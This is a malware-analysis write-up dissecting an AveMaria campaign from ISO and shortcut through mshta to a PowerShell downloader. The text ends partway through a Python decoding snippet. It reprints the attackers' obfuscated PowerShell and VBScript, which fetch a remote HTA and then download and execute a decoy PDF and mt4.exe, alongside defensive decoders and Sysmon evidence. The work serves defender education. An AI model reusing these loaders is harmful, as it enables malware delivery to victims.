When a Shortcut Sings: Dissecting an AveMaria mshta Campaign End-to-End

    Author: Valli-Nayagam Chokkalingam

    Introduction

    Not every infection chain worth studying is new. Some of the most instructive ones are simply well-built — stable, repeatable, and grounded in real attacker tradecraft. The campaign analyzed here comes from a slightly older AveMaria distribution wave documented by Zscaler ThreatLabz, where attackers relied on a staged delivery path using nothing more than Windows-native components to land a full remote-access foothold. No exploits, no macros, just a clean chain of execution from user interaction to C2.

    I chose this sample because it sits in the ideal learning zone for beginners: simple enough to reproduce in a lab, yet realistic enough to demonstrate how commodity malware actually arrives on endpoints. Each stage builds on the previous one — container, shortcut, mshta execution, staged download, in-memory unpacking — culminating in a fully functional RAT reaching out to its operator.

    In this post, we follow that chain all the way through. Not just “what runs,” but how it runs, what artifacts it leaves behind, and how the final payload transitions from an opaque blob into an active remote session. By the end, the goal is to see the entire path from initial click to live C2 — the moment the intrusion stops being a file and starts being an attacker.

    Figure 1. AveMaria Attack Chain.

    Stage 1 — The Delivery Vessel: An ISO That Isn’t What It Seems

    An ISO file is nothing more than a disk image — a byte-for-byte replica of what would normally live on a physical CD or DVD. Windows treats it accordingly. Double-click it, and the operating system quietly mounts the image as a new virtual drive, complete with its own drive letter, icon, and familiar folder view. No extraction tools, no warnings, no sense that anything unusual just happened. To the user, it looks like they’ve simply “opened” a folder that arrived via email or download.

    From an analysis perspective, mounting isn’t strictly necessary. Tools like 7-Zip can open ISO images directly, allowing investigators to inspect contents without triggering any automatic execution paths or altering system state. This makes it easier to examine the payload structure safely before interacting with it in a live environment.

    Attackers lean on this behavior because it strips away friction. Historically, files inside a mounted image did not inherit the Mark of the Web applied to the downloaded ISO itself, so protections keyed to that marker, such as SmartScreen prompts, did not fire for them. The content also arrives already organized, already named, already staged. Once mounted, the files appear local and trustworthy: not something fetched from the internet moments earlier, but something that feels like removable media. It’s a subtle psychological shift that lowers suspicion before any code even executes.

    In this sample, the mounted image contains what appears to be an innocuous file named Documents.lnk. Not a PDF, not a Word file — a Windows shortcut. To a casual glance, it blends in perfectly with legitimate office artifacts, often carrying a document-style icon and a believable name. But unlike a real document, a shortcut doesn’t contain content. It contains instructions — where to go, what to launch, and which arguments to pass along. That single click becomes the pivot point where a harmless-looking container transitions into an execution chain.

    Figure 2. The campaign arrives as a deceptively small ISO, a container designed to look harmless while staging the real entry point inside.

    Figure 3. Opening the ISO mounts it as a virtual DVD drive, disguising attacker-controlled contents as trusted local media.

    Figure 4. The ISO contains a single file, documents.lnk, a malicious shortcut disguised as a legitimate document to trigger the next stage.

    Stage 2 — The Trigger: Weaponized Shortcut Execution

    Windows shortcut files (.lnk) are not documents at all — they are instruction containers. A shortcut simply tells Windows what to launch, where it lives, and which arguments to pass along when the user double-clicks it. This makes them ideal staging mechanisms: they look harmless, carry familiar icons, and execute instantly without raising the same suspicion as scripts or executables.

    A quick right-click → Properties is often enough to reveal the illusion. The Target field exposes the real command that will run, and in this case it points not to a document viewer but to PowerShell, already a strong indicator that the file’s purpose is execution rather than opening content. Attackers commonly hide long or obfuscated commands here, sometimes padded to push the malicious portion out of immediate view.

    Figure 5. Inspecting the shortcut’s properties reveals that the “document” actually launches PowerShell, exposing its true purpose as an execution trigger.

    For a deeper look, the shortcut can be opened directly in a hex editor such as HxD. Despite being a binary format, .lnk files frequently contain readable strings embedded within their structure. Scanning for ASCII or Unicode text quickly surfaces the full command line — a PowerShell invocation with encoded or obfuscated parameters that will fetch or execute the next stage. Extracting that command reveals the true role of the file: not a document launcher, but a compact delivery vehicle designed to turn a single click into controlled code execution.

    Figure 6. Viewing the shortcut in a hex editor exposes the embedded PowerShell command, revealing the hidden instructions executed on click.
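
    The same string hunt can be scripted. The sketch below is a minimal, hypothetical helper (the function name and the 6-character minimum are illustrative choices, not part of the original analysis) that pulls printable ASCII and UTF-16LE runs out of raw bytes, which is where a shortcut's command-line arguments usually surface. It does not parse the .lnk structure itself, and the buffer is synthetic rather than the real sample.

```python
import re

def extract_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Return printable ASCII and UTF-16LE runs of at least min_len characters."""
    found = []
    # Plain ASCII: consecutive printable bytes.
    ascii_pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    found += [m.group().decode("ascii") for m in ascii_pattern.finditer(data)]
    # UTF-16LE: a printable byte followed by a zero byte, repeated.
    wide_pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found += [m.group().decode("utf-16-le") for m in wide_pattern.finditer(data)]
    return found

# Synthetic buffer standing in for shortcut bytes (assumption: not the real file).
sample = (
    b"\x4c\x00\x00\x00\x01\x14\x02\x00"
    + "powershell.exe -ExecutionPolicy UnRestricted".encode("utf-16-le")
    + b"\x00\x00\xff\xfe"
)

for text in extract_strings(sample):
    print(text)
```

    Running both patterns matters because shortcut arguments are commonly stored as wide characters, which a plain ASCII scan would miss.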

    Stage 3 — Initial Loader: PowerShell Takes Control

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    -ExecutionPolicy UnRestricted
    $ErrorActionPreference=0;
    $YofWYC = $Null;
    $GMZglTzk = 'boytLhXGNtg.shkcpeHpK/LcY/fm~cttkxPsPmtKheBassahImetmhYYBcZQo/:iorC.Nha';
    sal xOXqeLV ($GMZglTzk[(-44676+44688)]+$GMZglTzk[(31996-31953)]+$GMZglTzk[(26559-26555)]);
    xOXqeLV uDFvHxvnl ($GMZglTzk[(-48812+48860)]+$GMZglTzk[(-57051+57068)]+$GMZglTzk[(-44482+44488)]);
    xOXqeLV csBsb ($GMZglTzk[(-28324+28351)]+$GMZglTzk[(-44676+44688)]+$GMZglTzk[(-7250+7255)]+$GMZglTzk[(-15622+15625)]+$GMZglTzk[(31996-31953)]);
    foreach($PVeYoE in @(
    (-8771+8776),(-65196+65199),(44578-44575),(-35487+35503),
    (-25222+25234),(53013-52951),(58129-58108),(-13523+13544),
    (-58933+58945),(-53822+53832),(60473-60470),(33846-33819),
    (-46252+46295),(3385-3320),(-20808+20822),(-8945+8962),
    (-47806+47809),(24980-24968),(-13291+13302),(28341-28326),
    (-36009+36010),(5565-5538),(37420-37399),(30164-30159),
    (46917-46906),(-9230+9235),(175-172),(12473-12430)
    )) {
    $YofWYC += $GMZglTzk[$PVeYoE]
    };
    uDFvHxvnl ("csBsb $YofWYC");

    Figure 7. Obfuscated PowerShell embedded in the shortcut reconstructs a hidden URL at runtime and fetches the next stage.

    The shortcut never tries to open a document at all. It launches C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe with -ExecutionPolicy UnRestricted, and the script’s first statement sets $ErrorActionPreference = 0 (SilentlyContinue) so that errors are suppressed, handing control from Explorer straight to PowerShell. The script then sets up two variables: $GMZglTzk, a long, seemingly random string that functions as a character reservoir, and $YofWYC, an empty buffer that will hold the final output. Rather than naming sensitive commands directly, it manufactures them on the fly. Three characters picked from the reservoir spell sal, the built-in alias for Set-Alias, which is bound to the name xOXqeLV; that alias is then used to create uDFvHxvnl mapped to IEX (Invoke-Expression) and csBsb mapped to mshta. A loop walks through a list of computed indices, pulling one character at a time from $GMZglTzk to assemble a concealed address, https[:]//sgtmarkets[.]com/h.hta, that never appears in readable form until the script runs. The final line is effectively IEX("mshta https[:]//sgtmarkets[.]com/h.hta"), causing the legitimate mshta.exe binary to retrieve and execute the remote HTA content. Nothing is dropped to disk at this point; PowerShell’s job is simply to assemble the execution chain in memory and pass control to the next stage.
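
    The index arithmetic can be replayed offline without running any PowerShell. The sketch below is an analyst-side helper in Python (the function and constant names are illustrative, not from the sample): it copies the reservoir string and the index expressions from the script above, evaluates each pair, and prints the results with the address defanged.

```python
# Reservoir string copied from the PowerShell sample ($GMZglTzk).
RESERVOIR = "boytLhXGNtg.shkcpeHpK/LcY/fm~cttkxPsPmtKheBassahImetmhYYBcZQo/:iorC.Nha"

# Index expressions kept in the same sum/difference form the sample uses.
ALIAS_SET = [-44676 + 44688, 31996 - 31953, 26559 - 26555]
ALIAS_IEX = [-48812 + 48860, -57051 + 57068, -44482 + 44488]
ALIAS_MSHTA = [-28324 + 28351, -44676 + 44688, -7250 + 7255, -15622 + 15625, 31996 - 31953]
URL_INDICES = [
    -8771 + 8776, -65196 + 65199, 44578 - 44575, -35487 + 35503,
    -25222 + 25234, 53013 - 52951, 58129 - 58108, -13523 + 13544,
    -58933 + 58945, -53822 + 53832, 60473 - 60470, 33846 - 33819,
    -46252 + 46295, 3385 - 3320, -20808 + 20822, -8945 + 8962,
    -47806 + 47809, 24980 - 24968, -13291 + 13302, 28341 - 28326,
    -36009 + 36010, 5565 - 5538, 37420 - 37399, 30164 - 30159,
    46917 - 46906, -9230 + 9235, 175 - 172, 12473 - 12430,
]

def pick(indices):
    """Concatenate the reservoir characters at the given positions."""
    return "".join(RESERVOIR[i] for i in indices)

def defang(url):
    """Bracket the scheme separator and the first dot so the text is not clickable."""
    return url.replace("://", "[:]//").replace(".", "[.]", 1)

print(pick(ALIAS_SET), pick(ALIAS_IEX), pick(ALIAS_MSHTA))
print(defang(pick(URL_INDICES)))
```

    The mixed-case results for the first two aliases still work because PowerShell command names are case-insensitive.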

    Figure 8. With debug printing enabled, the script reveals its runtime behavior — reconstructing mshta and assembling the hidden URL character-by-character before initiating remote execution.

    Figure 9. Sysmon confirms PowerShell spawning mshta.exe with the reconstructed URL, validating the transition from in-memory loader to remote HTA execution.

    Stage 4 — The Pivot: HTA as a Script Host

    The chain now pivots into an HTA (HTML Application), a file type that looks like a web page but runs as a local Windows application under mshta.exe. Unlike regular web content, an HTA executes outside the browser sandbox, allowing VBScript/JScript to interact with the filesystem, registry, and COM interfaces using the current user’s privileges, a combination that makes HTAs a dependable living-off-the-land launch mechanism.

    In this sample, nearly all of the script serves as intentional clutter: empty routines and arbitrary names surrounding a single decoding function that reconstructs the true payload from a large numeric array (shyNkdc). The function subtracts a fixed offset (59108) from each value and converts the result via Chr(), assembling the final PowerShell command entirely at runtime.

    For analysis, the VBScript portion was extracted from the HTA (discarding the HTML wrapper and inert code) and reduced to a minimal standalone .vbs script containing only the decoding routine and array. To reveal the payload safely without executing it, the script was modified to display the decoded command in a message box and to write it in full to C:\decoded_output.txt. What initially appears as an impenetrable wall of numbers collapses into a simple, deterministic transformation (static encoded data in, clear executable command out) once the single functional component is isolated.

    Figure 10. Malicious HTA file containing embedded obfuscated VBScript that decodes and executes a hidden PowerShell command via mshta.exe.

    Option Explicit
    ' Helper: returns the VarType code of its argument
    Function baxlA(ByVal debHiYVRjoZPX)
        baxlA = VarType(debHiYVRjoZPX)
    End Function
    ' Decoder: subtracts a fixed offset from each array element and maps it to a character
    Function sbtfmbzBZiKj(ByVal shyNkdc)
        Dim debHiYVRjoZPX
        Dim CadHFhmcICIK
        Dim JRpOiBwoWm
        Dim yDwRYqrX
        yDwRYqrX = 59108
        debHiYVRjoZPX = baxlA(shyNkdc)
        ' 8204 = vbArray (8192) + vbVariant (12), i.e. an array of Variants
        If debHiYVRjoZPX = 8204 Then
            For Each CadHFhmcICIK In shyNkdc
                JRpOiBwoWm = JRpOiBwoWm & Chr(CadHFhmcICIK - yDwRYqrX)
            Next
        End If
        sbtfmbzBZiKj = JRpOiBwoWm
    End Function
    Sub xzyqy()
        Dim shyNkdc
        Dim QYARDSPMooGQ
    shyNkdc = Array(59220,59219,59227,59209,59222,59223,59212,59209,59216,59216,59154,59209,59228,59209,59140,59153,59177,59228,59209,59207,59225,59224,59213,59219,59218,59188,59219,59216,59213,59207,59229,59140,59193,59218,59190,59209,59223,59224,59222,59213,59207,59224,59209,59208,59140,59210,59225,59218,59207,59224,59213,59219,59218,59140,59226,59208,59198,59184,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59152,59140,59144,59212,59230,59223,59226,59212,59228,59209,59194,59173,59224,59194,59189,59205,59225,59224,59149,59231,59199,59181,59187,59154,59178,59213,59216,59209,59201,59166,59166,59195,59222,59213,59224,59209,59173,59216,59216,59174,59229,59224,59209,59223,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59152,59140,59144,59212,59230,59223,59226,59212,59228,59209,59194,59173,59224,59194,59189,59205,59225,59224,59149,59233,59167,59210,59225,59218,59207,59224,59213,59219,59218,59140,59179,59207,59193,59176,59181,59227,59183,59211,59194,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59149,59231,59213,59210,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59154,59177,59218,59208,59223,59195,59213,59224,59212,59148,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59163,59161,59156,59152,59162,59164,59164,59156,59160,59152,59162,59164,59164,59157,59158,59152,59162,59164,59164,59157,59158,59149,59149,59149,59140,59153,59209,59221,59140,59144,59192,59222,59225,59209,59149,59231,59222,59225,59218,59208,59216,59216,59159,59158,59154,59209,59228,59209,59140,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59140,59233,59209,59216,59223,59209,59213,59210,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59154,59177,59218,59208,59223,59195,
59213,59224,59212,59148,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59163,59161,59156,59152,59162,59164,59164,59157,59162,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59161,59159,59149,59149,59149,59140,59153,59209,59221,59140,59144,59192,59222,59225,59209,59149,59231,59220,59219,59227,59209,59222,59223,59212,59209,59216,59216,59154,59209,59228,59209,59140,59153,59177,59228,59209,59207,59225,59224,59213,59219,59218,59188,59219,59216,59213,59207,59229,59140,59225,59218,59222,59209,59223,59224,59222,59213,59207,59224,59209,59208,59140,59153,59178,59213,59216,59209,59140,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59233,59209,59216,59223,59209,59231,59191,59224,59205,59222,59224,59153,59188,59222,59219,59207,59209,59223,59223,59140,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59233,59233,59167,59210,59225,59218,59207,59224,59213,59219,59218,59140,59220,59173,59198,59196,59190,59191,59206,59209,59182,59229,59213,59229,59217,59182,59196,59192,59195,59194,59212,59148,59144,59215,59174,59206,59211,59191,59190,59219,59220,59228,59190,59219,59176,59179,59196,59186,59179,59182,59179,59228,59181,59149,59231,59144,59212,59216,59229,59215,59193,59223,59178,59220,59206,59198,59181,59227,59176,59211,59226,59224,59186,59140,59169,59140,59186,59209,59227,59153,59187,59206,59214,59209,59207,59224,59140,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59163,59164,59158,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59158,59156,59152,59162,59164,59163,59161,59156,59152,59162,59164,59163,59165,59157,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59156,59158,59152,59162,59164,59163,59163,59157,59152,59162,59164,59164,59157,59158,59152,59162,59164,59164,59156,59165,59152,59162,59164,59164,59
156,59161,59152,59162,59164,59164,59157,59160,59152,59162,59164,59164,59158,59156,59149,59149,59167,59199,59186,59209,59224,59154,59191,59209,59222,59226,59213,59207,59209,59188,59219,59213,59218,59224,59185,59205,59218,59205,59211,59209,59222,59201,59166,59166,59191,59209,59207,59225,59222,59213,59224,59229,59188,59222,59219,59224,59219,59207,59219,59216,59140,59169,59140,59199,59186,59209,59224,59154,59191,59209,59207,59225,59222,59213,59224,59229,59188,59222,59219,59224,59219,59207,59219,59216,59192,59229,59220,59209,59201,59166,59166,59192,59184,59191,59157,59158,59167,59144,59212,59230,59223,59226,59212,59228,59209,59194,59173,59224,59194,59189,59205,59225,59224,59140,59169,59140,59144,59212,59216,59229,59215,59193,59223,59178,59220,59206,59198,59181,59227,59176,59211,59226,59224,59186,59154,59176,59219,59227,59218,59216,59219,59205,59208,59176,59205,59224,59205,59148,59144,59215,59174,59206,59211,59191,59190,59219,59220,59228,59190,59219,59176,59179,59196,59186,59179,59182,59179,59228,59181,59149,59167,59222,59209,59224,59225,59222,59218,59140,59144,59212,59230,59223,59226,59212,59228,59209,59194,59173,59224,59194,59189,59205,59225,59224,59233,59167,59210,59225,59218,59207,59224,59213,59219,59218,59140,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59148,59144,59192,59180,59179,59208,59207,59209,59149,59231,59144,59186,59194,59226,59207,59206,59197,59176,59186,59185,59197,59186,59169,59162,59164,59163,59156,59160,59167,59144,59173,59229,59176,59222,59184,59198,59184,59229,59187,59196,59169,59144,59186,59225,59216,59216,59167,59210,59219,59222,59209,59205,59207,59212,59148,59144,59182,59223,59230,59205,59206,59193,59223,59221,59230,59140,59213,59218,59140,59144,59192,59180,59179,59208,59207,59209,59149,59231,59144,59173,59229,59176,59222,59184,59198,59184,59229,59187,59196,59151,59169,59199,59207,59212,59205,59222,59201,59148,59144,59182,59223,59230,59205,59206,59193,59223,59221,59230,59153,59144,59186,5919
4,59226,59207,59206,59197,59176,59186,59185,59197,59186,59149,59233,59167,59222,59209,59224,59225,59222,59218,59140,59144,59173,59229,59176,59222,59184,59198,59184,59229,59187,59196,59233,59167,59210,59225,59218,59207,59224,59213,59219,59218,59140,59222,59209,59178,59180,59216,59188,59198,59189,59209,59148,59149,59231,59144,59190,59196,59185,59226,59196,59221,59210,59228,59220,59195,59181,59212,59226,59210,59186,59140,59169,59140,59144,59209,59218,59226,59166,59173,59220,59220,59176,59205,59224,59205,59140,59151,59140,59147,59200,59147,59167,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59140,59169,59140,59144,59190,59196,59185,59226,59196,59221,59210,59228,59220,59195,59181,59212,59226,59210,59186,59140,59151,59140,59147,59176,59154,59220,59208,59210,59147,59167,59181,59210,59148,59192,59209,59223,59224,59153,59188,59205,59224,59212,59140,59153,59188,59205,59224,59212,59140,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59149,59231,59181,59218,59226,59219,59215,59209,59153,59181,59224,59209,59217,59140,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59167,59233,59177,59216,59223,59209,59231,59140,59144,59194,59198,59186,59229,59194,59225,59221,59181,59217,59179,59195,59198,59220,59220,59226,59140,59169,59140,59220,59173,59198,59196,59190,59191,59206,59209,59182,59229,59213,59229,59217,59182,59196,59192,59195,59194,59212,59140,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59164,59156,59164,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59162,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59162,59158,59152,59162,59164,59163,59161,59157,59152,59162,59164,59163,
59161,59157,59152,59162,59164,59164,59157,59165,59152,59162,59164,59164,59156,59163,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59159,59152,59162,59164,59164,59156,59157,59152,59162,59164,59164,59157,59164,59152,59162,59164,59164,59157,59157,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59161,59156,59152,59162,59164,59164,59156,59159,59152,59162,59164,59164,59157,59161,59152,59162,59164,59164,59157,59159,59152,59162,59164,59163,59161,59157,59152,59162,59164,59163,59163,59158,59152,59162,59164,59163,59161,59156,59152,59162,59164,59164,59157,59162,59152,59162,59164,59164,59156,59160,59152,59162,59164,59164,59156,59162,59149,59149,59167,59226,59208,59198,59184,59140,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59140,59144,59194,59198,59186,59229,59194,59225,59221,59181,59217,59179,59195,59198,59220,59220,59226,59167,59181,59218,59226,59219,59215,59209,59153,59181,59224,59209,59217,59140,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59167,59233,59167,59144,59228,59183,59211,59196,59140,59169,59140,59144,59190,59196,59185,59226,59196,59221,59210,59228,59220,59195,59181,59212,59226,59210,59186,59140,59151,59140,59147,59217,59224,59160,59154,59209,59228,59209,59147,59167,59140,59213,59210,59140,59148,59192,59209,59223,59224,59153,59188,59205,59224,59212,59140,59153,59188,59205,59224,59212,59140,59144,59228,59183,59211,59196,59149,59231,59179,59207,59193,59176,59181,59227,59183,59211,59194,59140,59144,59228,59183,59211,59196,59167,59233,59177,59216,59223,59209,59231,59140,59144,59197,59220,59179,59179,59205,59205,59180,59174,59226,59184,59229,59198,59229,59140,59169,59140,59220,59173,59198,59196,59190,59191,59206,59209,59182,59229,59213,59229,59217,59182,59196,59192,59195,59194,59212,59140,59148,59
205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59164,59156,59164,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59162,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59162,59158,59152,59162,59164,59163,59161,59157,59152,59162,59164,59163,59161,59157,59152,59162,59164,59164,59157,59165,59152,59162,59164,59164,59156,59163,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59159,59152,59162,59164,59164,59156,59157,59152,59162,59164,59164,59157,59164,59152,59162,59164,59164,59157,59157,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59161,59156,59152,59162,59164,59164,59156,59159,59152,59162,59164,59164,59157,59161,59152,59162,59164,59164,59157,59159,59152,59162,59164,59163,59161,59157,59152,59162,59164,59164,59157,59159,59152,59162,59164,59164,59158,59156,59152,59162,59164,59163,59161,59162,59152,59162,59164,59163,59161,59156,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59158,59160,59152,59162,59164,59164,59156,59161,59149,59149,59167,59226,59208,59198,59184,59140,59144,59228,59183,59211,59196,59140,59144,59197,59220,59179,59179,59205,59205,59180,59174,59226,59184,59229,59198,59229,59167,59179,59207,59193,59176,59181,59227,59183,59211,59194,59140,59144,59228,59183,59211,59196,59167,59233,59167,59167,59167,59167,59233,59222,59209,59178,59180,59216,59188,59198,59189,59209,59167)
        ' Decode the array, then display and save the result instead of executing it
        QYARDSPMooGQ = sbtfmbzBZiKj(shyNkdc)
        MsgBox QYARDSPMooGQ, 64, "Decoded Output (QYARDSPMooGQ)"
        Dim fso, f
        Set fso = CreateObject("Scripting.FileSystemObject")
        Set f = fso.CreateTextFile("C:\decoded_output.txt", True)
        f.WriteLine QYARDSPMooGQ
        f.Close
        WScript.Echo QYARDSPMooGQ
    End Sub
    xzyqy

    Figure 11. VBScript decoding logic extracted from the HTA that subtracts a fixed offset (59108) from an integer array to reconstruct and reveal the hidden PowerShell command.
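
    The same transformation is easy to reproduce outside of Windows Script Host. The Python sketch below is an illustrative re-implementation (the names `decode_shifted` and `PREFIX` are mine, not the sample's) applied to only the first 14 values of the shyNkdc array, which is enough to confirm the offset without reconstructing the whole command.

```python
OFFSET = 59108  # fixed offset taken from the HTA's decoder (yDwRYqrX)

def decode_shifted(values, offset=OFFSET):
    """Subtract the offset from each integer and map the result to a character."""
    return "".join(chr(value - offset) for value in values)

# First 14 values of the shyNkdc array shown above.
PREFIX = [59220, 59219, 59227, 59209, 59222, 59223, 59212,
          59209, 59216, 59216, 59154, 59209, 59228, 59209]

print(decode_shifted(PREFIX))  # powershell.exe
```

    Decoding a short prefix first is a cheap sanity check: if the output is readable, the offset is right and the full array can be processed the same way.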

    Figure 12. Message box displaying the decoded command output produced by the HTA’s embedded VBScript decoder logic.

    Figure 13. Sysmon confirming the decoded HTA payload in action: mshta.exe launches the HTA, which spawns PowerShell executing the reconstructed, heavily obfuscated command responsible for staging and running the next stage.

    Stage 5 — The Delivery: PowerShell Retrieves the Payload

    Stage 5 is where the “mystery blob” finally turns into something real. The HTA doesn’t drop an EXE directly — it hands off to a PowerShell routine that behaves like a tiny installer: resolve a URL, pull raw bytes over HTTPS, write them to disk, then execute based on file type.

    At the heart of this stage are four helpers:

    1. Decode-NumberArrayToString: turns numeric arrays into strings by subtracting a fixed offset (68704). This is how the script hides obvious indicators like class names, extensions, and URLs until runtime.
    2. Download-BytesFromUrl: instantiates a .NET WebClient whose class name (Net.WebClient) is itself decoded at runtime, forces TLS 1.2, and downloads the payload as a byte array (DownloadData()).
    3. Write-BytesToFile: persists those bytes using IO.File::WriteAllBytes().
    4. Execute-FileBasedOnType: a crude dispatcher that checks the file extension (also decoded at runtime) and chooses how to run it:
      • .dll → rundll32.exe
      • .ps1 → powershell.exe -File
      • anything else → Start-Process

    The actual delivery logic is in Stage-And-Execute-Payload, and it’s intentionally “quietly redundant.” It uses AppData as a staging directory and tries to keep re-downloading to a minimum:

    1. It targets AppData\D.pdf. If it already exists, it simply opens it (Invoke-Item). If not, it downloads bytes from a decoded URL, writes the file, then opens it.
    2. It then targets AppData\mt4.exe. Same deal: if present, execute; if missing, download from a second decoded URL, write it, and run it via the type-based launcher.

    That structure matters. It’s not just “download and run”; it’s “download once, reuse on every later run.” No persistence mechanism such as a scheduled task is created in this stage. Instead, the script is idempotent: it is built to resume cleanly and keep moving forward even if it is executed multiple times.
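
    The check-then-fetch pattern can be modeled in a few lines. The sketch below is a harmless Python illustration, not the sample's code: `stage_once` and the `fake_fetch` callback are hypothetical names, the callback returns fixed placeholder bytes instead of touching the network, and the file lives in a temporary directory.

```python
import os
import tempfile

def stage_once(path, fetch):
    """Write fetch() to path only if path is missing; report which branch ran."""
    if os.path.exists(path):
        return "reused"
    with open(path, "wb") as handle:
        handle.write(fetch())
    return "downloaded"

calls = []

def fake_fetch():
    # Stand-in for the download helper; records each call and returns dummy bytes.
    calls.append(1)
    return b"placeholder bytes"

with tempfile.TemporaryDirectory() as staging_dir:
    target = os.path.join(staging_dir, "D.pdf")
    first = stage_once(target, fake_fetch)
    second = stage_once(target, fake_fetch)

print(first, second, len(calls))  # downloaded reused 1
```

    For defenders, the practical consequence is that a second execution may produce no network traffic at all, so the absence of a download event does not mean the chain failed.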

    What looks like messy obfuscation (arrays everywhere, meaningless variable names) is mostly misdirection. Functionally, Stage 5 is a straightforward pipeline:

    decode → download → write → execute, twice — first for a decoy-looking “PDF,” then for the real executable (mt4.exe).

    function Write-BytesToFile($filePath, $bytes)
    {
        [IO.File]::WriteAllBytes($filePath, $bytes)
    }
    function Execute-FileBasedOnType($filePath)
    {
        if ($filePath.EndsWith((Decode-NumberArrayToString @(68750,68804,68812,68812))) -eq $True)
        {
            rundll32.exe $filePath
        }
        elseif ($filePath.EndsWith((Decode-NumberArrayToString @(68750,68816,68819,68753))) -eq $True)
        {
            powershell.exe -ExecutionPolicy Unrestricted -File $filePath
        }
        else
        {
            Start-Process $filePath
        }
    }
    function Download-BytesFromUrl($url)
    {
        $webClient = New-Object (Decode-NumberArrayToString @(68782,68805,68820,68750,68791,68805,68802,68771,68812,68809,68805,68814,68820))
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12
        $payloadBytes = $webClient.DownloadData($url)
        return $payloadBytes
    }
    function Decode-NumberArrayToString($encodedNumbers)
    {
        $offset = 68704
        $decodedString = $Null
        foreach ($num in $encodedNumbers)
        {
            $decodedString += [char]($num - $offset)
        }
        return $decodedString
    }
    function Stage-And-Execute-Payload()
    {
        $appDataPath = $env:AppData + '\'
        $pdfPayloadPath = $appDataPath + 'D.pdf'
        if (Test-Path -Path $pdfPayloadPath)
        {
            Invoke-Item $pdfPayloadPath
        }
        else
        {
            $pdfPayloadBytes = Download-BytesFromUrl(
                Decode-NumberArrayToString @(68808,68820,68820,68816,68819,68762,68751,68751,68819,68807,68820,68813,68801,68818,68811,68805,68820,68819,68750,68803,68815,68813,68751,68772,68750,68816,68804,68806)
            )
            Write-BytesToFile $pdfPayloadPath $pdfPayloadBytes
            Invoke-Item $pdfPayloadPath
        }
        $exePayloadPath = $appDataPath + 'mt4.exe'
        if (Test-Path -Path $exePayloadPath)
        {
            Execute-FileBasedOnType $exePayloadPath
        }
        else
        {
            $exePayloadBytes = Download-BytesFromUrl(
                Decode-NumberArrayToString @(68808,68820,68820,68816,68819,68762,68751,68751,68819,68807,68820,68813,68801,68818,68811,68805,68820,68819,68750,68803,68815,68813,68751,68813,68820,68756,68750,68805,68824,68805)
            )
            Write-BytesToFile $exePayloadPath $exePayloadBytes
            Execute-FileBasedOnType $exePayloadPath
        }
    }
    Stage-And-Execute-Payload

    Figure 14. Obfuscated PowerShell delivery routine (function names & variables renamed for clarity) that decodes embedded URLs, downloads payload bytes to the AppData directory, writes them to disk, and executes the files based on their type.
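
    The short arrays in the listing can be decoded by hand to confirm what the dispatcher compares against. The Python sketch below is an analyst-side model under stated assumptions: `decode` and `launcher_for` are my names, the example path is hypothetical, and `launcher_for` only returns the name of the launcher the script would choose; it never runs anything. The two URL arrays decode the same way and are left out here.

```python
OFFSET = 68704  # offset used by Decode-NumberArrayToString

def decode(values, offset=OFFSET):
    """Subtract the offset from each integer and map the result to a character."""
    return "".join(chr(value - offset) for value in values)

# Arrays copied from Execute-FileBasedOnType and Download-BytesFromUrl.
DLL_EXT = decode([68750, 68804, 68812, 68812])
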